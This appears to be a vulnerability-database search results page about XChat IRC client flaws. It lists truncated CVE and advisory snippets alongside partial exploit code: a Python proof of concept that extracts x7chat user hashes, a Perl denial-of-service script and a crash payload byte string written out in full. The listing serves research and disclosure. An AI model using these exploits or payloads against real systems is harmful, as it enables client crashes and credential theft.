180 matches found
xchat-sql.txt
!/usr/bin/python Exploit for xchat 2.0.5 Saca los usuarios y los hash By nonroot - 2008 it's a PoC, please use responsibly import string,urllib import sys,re print "Target host: i.e: http://127.0.0.1/x7chat/" host=rawinput"Target host include http and /: " print "Output file: i.e: salida.txt"...
Crlf injection
Multiple CRLF injection vulnerabilities in 1 xmms-thing 1.0, 2 XMMS Remote Control Script 1.07, 3 Disrok 1.0, 4 a2x 0.0.1, 5 Another xmms-info script 1.0, 6 XChat-XMMS 0.8.1, and other unspecified scripts for XChat allow user-assisted remote attackers to execute arbitrary IRC commands via CRLF...
CVE-2007-4397
Multiple CRLF injection vulnerabilities in 1 xmms-thing 1.0, 2 XMMS Remote Control Script 1.07, 3 Disrok 1.0, 4 a2x 0.0.1, 5 Another xmms-info script 1.0, 6 XChat-XMMS 0.8.1, and other unspecified scripts for XChat allow user-assisted remote attackers to execute arbitrary IRC commands via CRLF...
CVE-2007-4397
CVE-2007-4397 involves multiple CRLF injection vulnerabilities in several XMMS-related scripts (e.g., xmms-thing 1.0, XMMS Remote Control Script 1.07, Disrok 1.0, a2x 0.0.1, Another xmms-info script 1.0, XChat-XMMS 0.8.1, and related XChat scripts). The underlying issue is CRLF sequences in the s...
Fish多个远程缓冲区溢出漏洞
FiSH是很多流行的irc客户端所使用的用于实现加密的插件。 FiSH的xchat插件实现上存在多个缓冲区溢出漏洞,远程攻击者可能利用这些漏洞控制用户机器。 FiSH的xchat插件代码在处理入站数据时会注册4个函数: xchathookserverph, "PRIVMSG", XCHATPRINORM, decryptincoming, 0; xchathookserverph, "NOTICE", XCHATPRINORM, noticereceived, 0; xchathookserverph, "TOPIC", XCHATPRINORM, decryptincoming, 0;...
CVE-2006-4455
Unspecified vulnerability in Xchat 2.6.7 and earlier allows remote attackers to cause a denial of service crash via unspecified vectors involving the PRIVMSG command. NOTE: the vendor has disputed this vulnerability, stating that it does not affect 2.6.7 "or any recent version"...
CVE-2006-4455
Unspecified vulnerability in Xchat 2.6.7 and earlier allows remote attackers to cause a denial of service crash via unspecified vectors involving the PRIVMSG command. NOTE: the vendor has disputed this vulnerability, stating that it does not affect 2.6.7 "or any recent version"...
CVE-2006-4455
Summary : CVE-2006-4455 concerns Xchat up to version 2.6.7 (and earlier) with an unspecified vulnerability that can cause a remote denial-of-service (crash) via the PRIVMSG command. Several sources note the vendor disputes the issue and state it does not affect 2.6.7 or any recent version. Affect...
CVE-2006-4455
Unspecified vulnerability in Xchat 2.6.7 and earlier allows remote attackers to cause a denial of service crash via unspecified vectors involving the PRIVMSG command. NOTE: the vendor has disputed this vulnerability, stating that it does not affect 2.6.7 "or any recent version"...
CVE-2006-4455
Removed by vendor...
PT-2006-5255 · Xchat · Xchat
Name of the Vulnerable Software and Affected Versions: Xchat versions 2.6.6 and earlier Description: The issue allows remote attackers to cause a denial of service, resulting in a crash, via unspecified vectors involving the PRIVMSG command. The vendor has disputed this issue, stating that it doe...
xchat267.txt
...
XChat <= 2.6.7 (win version) Remote Denial of Service Exploit (perl)
No description provided by source. !/usr/bin/perl rewritten because perl is more elegant than php payload taken from original that ratboy submitted use strict; use Net::IRC; my $nick, $server, $port, $channel, $victim = @ARGV; my $irc = new Net::IRC; my $connect = $irc - newconn Nick = "$nick",...
XChat 2.6.7 (Windows) - Remote Denial of Service (Perl)
XChat 2.6.7 Windows - Remote Denial of Service Perl !/usr/bin/perl rewritten because perl is more elegant than php payload taken from original that ratboy submitted use strict; use Net::IRC; my $nick, $server, $port, $channel, $victim = @ARGV; my $irc = new Net::IRC; my $connect = $irc - newconn...
XChat <= 2.6.7 (win version) Remote Denial of Service Exploit (perl)
Exploit for unknown platform in category dos / poc ==================================================================== XChat newconn Nick = "$nick", Server = "$server", Port = $port, Ircname= 'whatever' or die "$0: Error\n"; my $payload =...
XChat 2.6.7 (Windows) - Remote Denial of Service (PHP)
XChat 2.6.7 Windows - Remote Denial of Service PHP /str0ke /exec -o perl -e 'print "\x9x\xF0\x92\x8D\x85\xF1\xA5\x90\xB4\xF1\x96\x9E\x85\xF1\xA6\x8D\xA5\xF1\xB8\xA5\x85\xF1\xA7\x95\xA8\x29\xF2\x95\x95\x82"' ? ?php // XChat = 2.6.7 Windows Remote Crash DoS by ratboy // Tested on Windows SP1/SP2 //...
XChat <= 2.6.7 (win version) Remote Denial of Service Exploit (php)
Exploit for unknown platform in category dos / poc =================================================================== XChat /str0ke /exec -o perl -e 'print "\x9x\xF0\x92\x8D\x85\xF1\xA5\x90\xB4\xF1\x96\x9E\x85\xF1\xA6\x8D\xA5\xF1\xB8\xA5\x85\xF1\xA7\x95\xA8\x29\xF2\x95\x95\x82"' ? ?php // XChat ...
XChat <= 2.6.7 (win version) Remote Denial of Service Exploit (php)
No description provided by source. ? another way to test this with irssi/bitchx below /str0ke /exec -o perl -e 'print "\x9x\xF0\x92\x8D\x85\xF1\xA5\x90\xB4\xF1\x96\x9E\x85\xF1\xA6\x8D\xA5\xF1\xB8\xA5\x85\xF1\xA7\x95\xA8\x29\xF2\x95\x95\x82"' ? ?php // XChat = 2.6.7 Windows Remote Crash DoS by...
XChat 2.6.7 (Windows) - Remote Denial of Service
/str0ke /exec -o perl -e 'print "\x9x\xF0\x92\x8D\x85\xF1\xA5\x90\xB4\xF1\x96\x9E\x85\xF1\xA6\x8D\xA5\xF1\xB8\xA5\x85\xF1\xA7\x95\xA8\x29\xF2\x95\x95\x82"' ? ?php // XChat = 2.6.7 Windows Remote Crash DoS by ratboy // Tested on Windows SP1/SP2 // The following bug was tested on the XChat = 2.6.7 ...
RHEL 2.1 / 3 : xchat (RHSA-2004:585)
An updated xchat package that fixes a stack-based buffer overflow in the SOCKSv5 proxy code. X-Chat is a graphical IRC chat client for the X Window System. A stack-based buffer overflow has been fixed in the SOCKSv5 proxy code. An attacker could create a malicious SOCKSv5 proxy server in such a w...